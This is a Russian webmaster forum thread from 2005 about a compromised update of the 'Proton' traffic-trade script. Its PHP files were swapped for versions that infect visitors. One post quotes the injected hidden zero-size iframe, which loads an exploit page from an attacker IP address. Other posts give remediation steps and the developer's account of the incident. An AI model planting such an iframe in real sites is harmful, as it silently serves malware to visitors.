Реклама на сайте Advertise with us

Что с протоном? Не обновляйте, это ахтунг!

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 17/09/05 в 13:46       Ответить с цитатойцитата 

Сегодня ткнул на апдейт протона и мне на все страницы сиджа заебенили експлойт. Exploit.HTML.Mht
Грузиццо он отсюда 85.255.113.10

http://www.proton-tm.com/forum/ - та же история.

Вот такая вот неприятная картина вырисовывается.

0
 

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 17/09/05 в 13:56       Ответить с цитатойцитата 

Зашёл с тестовой тачки. Чёто грузанулось. Посмотрим чего продают.

0
 



С нами с 07.02.05
Сообщения: 691
Рейтинг: 435

Ссылка на сообщениеДобавлено: 17/09/05 в 14:01       Ответить с цитатойцитата 

Похоже поломали их.

4
 



С нами с 25.08.04
Сообщения: 601
Рейтинг: 133

Ссылка на сообщениеДобавлено: 17/09/05 в 14:06       Ответить с цитатойцитата 

Мля внатуре! меня тоже ломанули. оут пхп

<iframe SRC="http://85.255.113.18/inc/nan23.html" WIDTH=0 BORDER=0 HEIGHT=0></iframe>
Zend

trade.php тоже самое

Последний раз редактировалось: Lorix (17/09/05 в 14:13), всего редактировалось 1 раз

4
 

Вселенский разум

С нами с 18.10.04
Сообщения: 2563
Рейтинг: 1227

Ссылка на сообщениеДобавлено: 17/09/05 в 14:08       Ответить с цитатойцитата 

Продают антиспайваре TOP ANTI SPYWARE + PPC. НЕ ДЕЛАЙТЕ АПДЕЙТ ПРОТОНА !

4
 

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 17/09/05 в 14:22       Ответить с цитатойцитата 

Да, парни продумалисьicon_smile.gif Это ж скоко трафа нахаляву!!!

Короче грузят ППЦ и продают софт. 171 это я так понимаю ID этого адверта.
http://www.clicksearchclick.biz/index.php
http://topantispyware.com/overview.php?171

Предлагаю админам этот топик залочить наверху, до решения этой проблемы.

Последний раз редактировалось: Scrudge (17/09/05 в 14:23), всего редактировалось 1 раз

0
 



С нами с 25.08.04
Сообщения: 601
Рейтинг: 133

Ссылка на сообщениеДобавлено: 17/09/05 в 14:22       Ответить с цитатойцитата 

какие они ещё файлы подменили?

4
 

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 17/09/05 в 14:24       Ответить с цитатойцитата 



Одного out.php достаточно, что бы весь траф протоновский заражать.

0
 



С нами с 05.07.05
Сообщения: 439
Рейтинг: 331

Ссылка на сообщениеДобавлено: 17/09/05 в 14:27       Ответить с цитатойцитата 

Это что получается?
Какие-то ребятишки поломали сайт,
изменили линк в сурсах, зазендили,
и ещё положили куда надо?

Что то мне не верится :-)

4
 



С нами с 06.11.02
Сообщения: 24551
Рейтинг: 5315

Ссылка на сообщениеДобавлено: 17/09/05 в 14:30       Ответить с цитатойцитата 

Замените файлы на старые. Вчерашний апдейт:
http://www.viva-host.com/proton.html

Желаю удачи.

Your Ad Here. PM.

4
 



С нами с 09.11.04
Сообщения: 319
Рейтинг: 499

Ссылка на сообщениеДобавлено: 17/09/05 в 14:57       Ответить с цитатойцитата 

Это просто пиздец. Я обязательно докопаюсь до истины и найду того, кто это сделал.
Ситуация такая - кто-то изменил 2 файла на нашем сервере, trade.php и out.php и сделал 'апдейт'. Кто успел его поставить - поставили вместо оригинальных фалов файлы с вирусом (что он делает - я еще не разобрался).
Сейчас (15.49 МСК) на сервере уже лежат ОРИГИНАЛЬНЫЕ, правильные файлы, можете смело обновляться.

Ифрейм ставился от парнерки toolbarparter (как минимум). Прошу владельца партнерки появиться здесь, и рассказать всем как лечится от бяки.

Приношу всем пользователям Протона извинения за случившееся icon_sad.gif(
Буду информировать о развитии событий в этом топике.

4
 

ergo bibamus

С нами с 13.07.05
Сообщения: 729
Рейтинг: 967

Ссылка на сообщениеДобавлено: 17/09/05 в 15:11       Ответить с цитатойцитата 

LOVE писал:
Замените файлы на старые. Вчерашний апдейт:
http://www.viva-host.com/proton.html
Желаю удачи.

Love красавчик, спасибо большое smail54.gif

4
 

?u=13378

С нами с 26.05.05
Сообщения: 3750
Рейтинг: 2010


Передовик Master-X (01.09.2006)
Ссылка на сообщениеДобавлено: 17/09/05 в 15:13       Ответить с цитатойцитата 

Kildoozer писал:
Это просто пиздец. Я обязательно докопаюсь до истины и найду того, кто это сделал.
Ситуация такая - кто-то изменил 2 файла на нашем сервере, trade.php и out.php и сделал 'апдейт'. Кто успел его поставить - поставили вместо оригинальных фалов файлы с вирусом (что он делает - я еще не разобрался).
Сейчас (15.49 МСК) на сервере уже лежат ОРИГИНАЛЬНЫЕ, правильные файлы, можете смело обновляться.
Ифрейм ставился от парнерки toolbarparter (как минимум). Прошу владельца партнерки появиться здесь, и рассказать всем как лечится от бяки.
Приношу всем пользователям Протона извинения за случившееся :((
Буду информировать о развитии событий в этом топике.


пиши/стучи владельцам партнёрки пусть баннят акк

http://leetd.com/ — Дизайн

4
 



С нами с 30.07.05
Сообщения: 149
Рейтинг: 64

Ссылка на сообщениеДобавлено: 17/09/05 в 15:17       Ответить с цитатойцитата 

Я сегодня хотел проинсталить протон... так и не вышло...писало мол проблемы с Zend.... после этого ... в командере появился какой то левый доступ к фтп... flatbox.nl ... вот такой вот....

Сейчас сижу хаотично меняю везде пароли...

Что то уже известно что эти чупакабры могли запоганить?

4
 



С нами с 17.09.05
Сообщения: 252
Рейтинг: 145

Ссылка на сообщениеДобавлено: 17/09/05 в 15:30       Ответить с цитатойцитата 

Утром задумался что за нах если апдейт недавно был + делаю его постоянно показывает что ошибка с переменными типо 777 не стоит =(

Я часа 2 менял переменные, потом подключил хостера с ним меняли часа 2 - не получилось в конце концов не получилось решил проверить скрипт - БАБАХ ! ну думаю ДОПОМЕНЯЛИСЬ !

Захожу на форум - читаю ... БАБАХ номер Два !

Быстро вытащил с вчерашнего бэк апа 2 файлы trade.php и out.php

всё пока вроде работает !

4
 

мы, цари - народ работящий!

С нами с 11.06.05
Сообщения: 13121
Рейтинг: 4892


Передовик Master-X (01.09.2018)
Ссылка на сообщениеДобавлено: 17/09/05 в 15:33       Ответить с цитатойцитата 

Спасибо за out.php
А то сразу trade упал.

4
 

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 17/09/05 в 15:36       Ответить с цитатойцитата 

А у меня как оказалось и admin.php слетел.

0
 

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 17/09/05 в 15:37       Ответить с цитатойцитата 

fazer писал:
Сейчас сижу хаотично меняю везде пароли...


Пользуй касперского. Он эту шляпу сразу поймал и удалил нах.

0
 



С нами с 02.10.03
Сообщения: 83
Рейтинг: 25

Ссылка на сообщениеДобавлено: 17/09/05 в 15:40       Ответить с цитатойцитата 

Mua-ha-ha-ha!
тревожный апдейт.
пацаны постарались поднасрать - беспредел. Хоть бы фильтры на русских ставили.
Мораль - опасность! Инсталим Аврору )

С уважением, нах.

4
 

?u=13378

С нами с 26.05.05
Сообщения: 3750
Рейтинг: 2010


Передовик Master-X (01.09.2006)
Ссылка на сообщениеДобавлено: 17/09/05 в 15:44       Ответить с цитатойцитата 

roxx писал:
Пользуй касперского. Он эту шляпу сразу поймал и удалил нах.
пользуйтесь аутпостом(отключаем активх, vb, скрытые фрэймы) и вам будет счастье :)

http://leetd.com/ — Дизайн

4
 

A good rest is half the work

С нами с 09.10.04
Сообщения: 1167
Рейтинг: 602

Ссылка на сообщениеДобавлено: 17/09/05 в 15:57       Ответить с цитатойцитата 

leetdesign писал:
пользуйтесь аутпостом(отключаем активх, vb, скрытые фрэймы) и вам будет счастье icon_smile.gif


Не, аутпост - это паранояicon_smile.gif) Он сЦуко вообще всё обрубает нах. Может его и можно как-то настроить гибко, но я неосилил.

0
 



С нами с 19.02.05
Сообщения: 51
Рейтинг: 3

Ссылка на сообщениеДобавлено: 17/09/05 в 16:41       Ответить с цитатойцитата 

вот как оно бывает

4
 



С нами с 21.08.05
Сообщения: 16
Рейтинг: 5

Ссылка на сообщениеДобавлено: 18/09/05 в 09:04       Ответить с цитатойцитата 

Встречный вопрос. Как можно заметить скрипт out.php на точно такой же но с ифреймом. Да еще и закодированный Зендом ?

0
 



С нами с 09.11.04
Сообщения: 319
Рейтинг: 499

Ссылка на сообщениеДобавлено: 18/09/05 в 12:41       Ответить с цитатойцитата 

Файл был заменен на файл с ифреймом и одним словом 'Zend'. Размер этого файла 90 байт, у меня осталась копия.

Уязвимость на сервере бела наедена и устранена, все оказалось гораздо проще чем мы думали icon_sad.gif

Человек, который это сделал найден, через одну небезызвестную партнерку. Владелец партнерки отказался сообщать номер его аси. Самое интересное, что владелец партнерки прекрасно знает, что человек этот специализируется на хаке сайтов, но отказываться работать с ним не собирается, и более того, он мне сказал '****** не трогает сайты принадлежащие русским авм'ам. наверное не знал. скажу ему.' Замечательно просто, какой благородный человек, русских он не трогает!
Как только все выяснится и подтвердится на 100% - сообщу кто он такой, пусть ВСЕ спонсоры забанят его у себя. Зла на него не хватает.

Последний раз редактировалось: Kildoozer (18/09/05 в 12:46), всего редактировалось 1 раз

0
 



С нами с 09.11.04
Сообщения: 319
Рейтинг: 499

Ссылка на сообщениеДобавлено: 18/09/05 в 12:44       Ответить с цитатойцитата 

дабл пост.

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »